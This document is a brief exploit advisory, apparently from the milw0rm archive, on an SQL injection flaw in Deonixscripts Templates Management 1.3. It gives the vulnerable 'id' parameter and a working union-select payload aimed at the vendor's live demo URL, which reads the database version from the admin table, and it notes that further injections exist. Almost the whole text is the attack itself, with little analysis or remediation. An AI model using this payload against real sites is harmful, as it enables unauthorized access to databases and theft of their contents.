Deonixscripts Templates Management Version 1.3 SQL Injection Vulnerability
[+] Author : d3b4g
[+] Email : bl4ckend[at]gmail.com
[+] Twitter : twitter.com/schaba
[+] Vulnerability : SQL injection
() about script:- Web Templates management System allows you to start your own
Web design business in no time by providing you with an impressive list of
features. You can sell individual templates (exclusive or recurring sale) or
offer free download to registered members by offering them with free or paid
() Vulnerability demo :- http://www.site.com/path/index.php?action=readmore&id=(SQL c0de)
() Live demo :- http://www.deonixscripts.com/demo/tplmgt13/index.php?action=readmore&id=-1+union+select+1,version(),3,4+from+admin--
# note :- This script is pr0n to multiple sql injection vuln.
From Tiny little island of Maldivies
# milw0rm.com [2009-07-24]